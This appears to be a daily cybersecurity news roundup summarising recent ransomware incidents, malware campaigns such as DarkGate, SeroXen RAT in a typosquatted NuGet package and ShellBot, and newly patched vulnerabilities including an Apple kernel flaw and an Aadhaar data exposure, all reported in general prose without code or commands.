Is any open-source ecosystem safe from attackers? Security researchers have discovered SeroXen RAT in malicious NuGet packages, underscoring how attackers continue to exploit open-source ecosystems and the developers that use them. Meanwhile, users of instant messaging applications, such as Skype and Teams, are being advised to enforce rules, including MFA, to prevent DarkGate malware infections. This new campaign leverages compromised user accounts of the messaging applications and security experts are not sure (as of now) how they were compromised in the first place.

Apple has released iOS and iPadOS updates to fix a local privilege escalation vulnerability that's been exploited in attacks by unknown cybercriminals. Notably, many recently patched iOS flaws exploited in the wild have been linked to commercial spyware vendors.

Top Breaches Reported in the Last 24 Hours

Black Basta group cripples Edwardian Hotels

The Black Basta ransomware group claimed responsibility for a cyberattack on Edwardian Hotels London, a luxury hotel chain in the U.K. The group has posted samples of exfiltrated data on its website, including passports and bank account information as proof of the attack. The ransom amount and the full extent of the data breach have not been disclosed. Cybersecurity experts suggest that hackers often target premium hotels for ransomware attacks, seeking substantial ransoms in exchange for stolen data.

Top Malware Reported in the Last 24 Hours

DarkGate malware spreads via instant messaging

Threat actors distributed DarkGate malware using compromised instant messaging platforms Skype and Microsoft Teams from July to September, with 41% of the targets in the Americas. DarkGate is a potent loader linked to various malicious activities, including data theft, keylogging, cryptocurrency mining, and ransomware like Black Basta. Trend Micro researchers observed the developer of DarkGate advertising the malware on underground forums and offering it as malware-as-a-service to other threat actors, leading to increased activity.

Authorities update AvosLocker’s list of tools

The FBI and the CISA updated their advisory on AvosLocker ransomware affiliates, revealing that they are known to use open-source utilities and legitimate software alongside custom PowerShell and batch scripts. The agencies also shared a YARA rule for detecting malware posing as a legitimate network monitoring tool. To defend against AvosLocker ransomware, organizations are recommended to implement application control mechanisms, restrict remote desktop services, apply the principle of least privilege, and keep software and code updated, among other practices.

Void Rabisu launches ROMCOM 4.0

Trend Micro experts disclosed attack campaigns by Void Rabisu actors that target Ukraine and countries supporting Ukraine. The sophisticated cyber threat group is involved in both financially motivated ransomware attacks and espionage campaigns for a wide range of entities. Recently, it employed an evolved version of its ROMCOM backdoor called ROMCOM 4.0 (aka PEAPOD) to target the Women Political Leaders (WPL) Summit and implemented a TLS-enforcing technique for added security.

ShellBot malware abuses vulnerable Linux servers

Threat actors behind the ShellBot (aka PerlBot) malware were found employing hexadecimal IP addresses to compromise poorly secured Linux SSH servers and deploy the malware. ShellBot, known for targeting servers with weak SSH credentials, is used for launching DDoS attacks and deploying cryptocurrency miners. This shift to hexadecimal IP addresses is an attempt to evade URL-based detection mechanisms. Security experts recommend using strong, regularly changed passwords to thwart attack attempts.

NuGet packages drop SeroXen RAT

Security researchers detected a suspicious NuGet package, "Pathoschild.Stardew.Mod.Build.Config," published by the user "Disti." It was a typosquatting attempt to disguise it as a legitimate package in order to deliver the SeroXen RAT. Disti's profile showed a pattern of download inflation, raising suspicions. The package included an installation script capable of downloading and running a highly obfuscated batch script, which ultimately executed a PowerShell script deploying the SeroXen RAT.

Top Vulnerabilities Reported in the Last 24 Hours

Indian government patches flaw exposing Aadhaar data

A security researcher discovered a bug in the West Bengal government’s e-District web portal that exposed residents' Aadhaar numbers, identity cards, fingerprints, and other sensitive information. The vulnerability allowed anyone with a login to the e-District system to access land deeds by guessing sequential deed application numbers. The researcher reported the issue to India’s CERT, and it was fixed soon after.

Apple patches actively exploited Kernel flaw

Apple has released updates for iOS and iPadOS to address a local privilege escalation vulnerability (CVE-2023-42824) that has been actively exploited in attacks. While Apple did not disclose details about the attacks or the source of the vulnerability report, many recent iOS exploits have been linked to commercial spyware vendors. The patch was initially introduced in iOS 17.0.3 and is now available for devices running iOS versions prior to 16.6 via iOS 16.7.1 and iPadOS 16.7.1 updates.